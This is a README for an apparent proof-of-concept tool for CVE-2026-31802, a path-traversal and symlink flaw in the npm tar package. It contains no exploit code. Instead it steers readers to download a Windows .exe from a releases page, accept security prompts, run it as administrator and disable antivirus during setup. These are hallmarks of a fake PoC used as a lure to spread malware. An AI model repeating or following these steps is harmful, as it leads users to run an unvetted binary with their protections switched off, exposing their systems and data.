Share
## https://sploitus.com/exploit?id=94F320F0-5912-58D0-9916-A3A2F3599F1F
# πŸ›‘οΈ CVE-2026-31802 - Simple Proof of Concept Viewer

[![Download CVE-2026-31802](https://img.shields.io/badge/Download_CVE--2026--31802-ff6347?style=for-the-badge&logo=github)](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases)

---

## πŸ“‹ About CVE-2026-31802

This repository provides a proof of concept (PoC) and write-up for CVE-2026-31802. The issue is a security vulnerability in the npm tar package. It allows attackers to trick the software into writing files outside its allowed folder by abusing symbolic links and path traversal.

This can lead to overwriting important files on your computer without your permission. Understanding and testing this vulnerability can help improve security. This project shows how the vulnerability works and helps security researchers verify fixes.

---

## πŸ–₯️ System Requirements

To run this software on a Windows machine, make sure your system meets these requirements:

- Windows 10 or later  
- At least 2 GB of free hard drive space  
- Internet connection to download the files  
- Basic file management skills (download, open files)

No programming or developer tools are necessary. Anyone who can use a web browser and run simple programs can follow these steps.

---

## πŸš€ Getting Started: How to Download and Use

The download is not a single file but a releases page. Follow these steps carefully:

1. **Visit the Releases Page**

   Click the badge above or go directly to this link:  
   [https://github.com/Recorded-texteditor120/CVE-2026-31802/releases](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases)

2. **Find the Latest Version**

   On the releases page, look for the latest release. It usually appears at the top of the list and includes the date.

3. **Download the Correct File**

   Click on the file that fits Windows most likely with an `.exe` or `.zip` extension. If unsure, choose `.exe` to make installation easier.

4. **Store the File**

   Save the file in a known folder such as `Downloads` or `Desktop`.

---

## πŸ’Ύ Installation and Running the Software

If you downloaded an `.exe` file:

1. Locate the downloaded `.exe` file where you saved it.
2. Double-click the file to start the installation or run the program directly.
3. If a security prompt appears, choose β€œRun” or β€œAllow”.
4. Follow any on-screen prompts to complete the setup.
5. The software will open and you can use it immediately.

If you downloaded a `.zip` file:

1. Right-click the `.zip` file and select "Extract All".
2. Choose a folder, like the Desktop, to extract the files.
3. Open the extracted folder.
4. Double-click the main program file (`.exe`) to launch.

---

## πŸ” Using the Software

This application works as a demonstration tool to show how the vulnerability operates.

- Load or simulate npm tar archives to test path traversal and symlink behavior.
- Observe how files can be written outside the extraction folder.
- Use this tool to understand the risk and develop mitigation steps.

The interface will guide you with simple buttons and text boxes. No programming skills are required. Follow the on-screen instructions carefully.

---

## βš™οΈ How This Demonstration Works

The software replicates the security flaw in the npm tar module.

- It creates special archive files with symbolic links.
- These links try to escape the allowed file path.
- The tool shows that these files can be overwritten outside the extraction folder.

This behavior highlights why the vulnerability is serious and needs a fix.

---

## πŸ”„ Updating the Software

Check the releases page regularly for updates:  
[https://github.com/Recorded-texteditor120/CVE-2026-31802/releases](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases)  

Download and install new versions the same way you got the first one. Updates may include bug fixes, security patches, or usability improvements.

---

## πŸ›  Troubleshooting

- If the program does not start, try right-clicking the file and selecting β€œRun as administrator.”  
- If Windows blocks the file, look for a notification in the security center that allows you to run or unblock the file.  
- Ensure your system meets the requirements above.  
- If the interface looks incomplete, your antivirus may have blocked some parts. Try disabling it temporarily during setup.  
- For any problems downloading, check your internet connection or try a different browser.

---

## πŸ“Œ Additional Information

The software is for educational and testing purposes only. Its goal is to help improve security awareness and fixes for this specific npm tar weakness.

The repository includes detailed documentation on the vulnerability, the exploit method, and the testing process. Feel free to read the included files for deeper understanding.

---

## πŸ—‚ Topics and Tags

The project covers:

- cve  
- cve-2026-31802  
- exploit  
- node-tar  
- path-traversal  
- poc  
- security  
- security-research  
- symlink  
- tar  
- vulnerability

These terms relate to the nature of the vulnerability and the fields involved.

---

## ⚑ Quick Access Link to Download

[![Get CVE-2026-31802](https://img.shields.io/badge/Get_CVE--2026--31802-4CAF50?style=for-the-badge&logo=github)](https://github.com/Recorded-texteditor120/CVE-2026-31802/releases)